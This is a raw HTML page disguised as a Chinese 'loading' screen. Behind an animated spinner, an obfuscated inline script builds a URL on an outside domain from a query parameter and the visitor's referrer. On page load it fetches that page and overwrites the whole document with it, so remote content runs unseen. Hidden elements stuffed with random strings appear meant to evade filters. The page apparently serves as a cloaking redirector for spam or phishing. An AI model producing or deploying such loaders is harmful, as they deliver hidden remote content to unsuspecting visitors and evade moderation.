<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .yFNElnJUM {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .yFNElnJUM .GPdI083eI {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .yFNElnJUM .content {
            line-height: 50px;
            text-align: center
        }

        .yFNElnJUM .img {
            width: 100%
        }

        .yFNElnJUM .EV5AZBo {
            text-align: center
        }

        .yFNElnJUM .EV5AZBo span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .yFNElnJUM .EV5AZBo span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .yFNElnJUM .EV5AZBo span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .yFNElnJUM .EV5AZBo span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .yFNElnJUM .EV5AZBo span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .yFNElnJUM .EV5AZBo span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .yFNElnJUM .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function UUbPjpLYx9(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var cjLALig = UUbPjpLYx9('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ cjLALig +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ cjLALig +".html?a=share";
		}
		
        VzLN66DK=url+"#"+new Date().getTime();
        VzLN66DK && function() {
            $.get(VzLN66DK, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<b style='display:none' >R0MtyPjrTKHPSFYyGSyf2kvun9aZxhkNo9pOPlb0uzP6S1fXTliER3fMBvCaTLps</b>
<div style='display:none'>xZqdUmPnRmlQpiWNmIJB3BVASxNmwfgUnlfvpxeKRv2S8rimz5kIZY3YwsfN6Z4ScwMDIYnLP6XU0</div>
<a  href='#' style='display:none'>wdrDJGHpeKUxx5mFSCdasvQeZAMXug4qMvPVCKX4lgsmDSdH7KqjuXbDFfbUtUuDyYi6fw29UvjzfeYiaLcLxgNbbYGRjP0dQ7CD</a>
<p  style='display:none'>l8p8FB1ldqu4DKWWDxmMXUWSjR0HUxa3g3Jr6aq9VudcncpH</p><div class="yFNElnJUM">
    <div class="GPdI083eI">
        <div class="EV5AZBo">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>TiZ48dInUSJxKZ9ezkHDrYR608d6aBV8ryCcVfaaQOnhJRp97zkoIwp1LzMLWiY6FEtR</p>
<span style='display:none'>Uhh8rYvL8fv6MD5TG</span>
<b style='display:none' >JaspC1tIU2Uz2L6fAJ5PrT4ALLdQR</b>
<span style='display:none'>Uhh8rYvL8fv6MD5TG</span></body>
</html>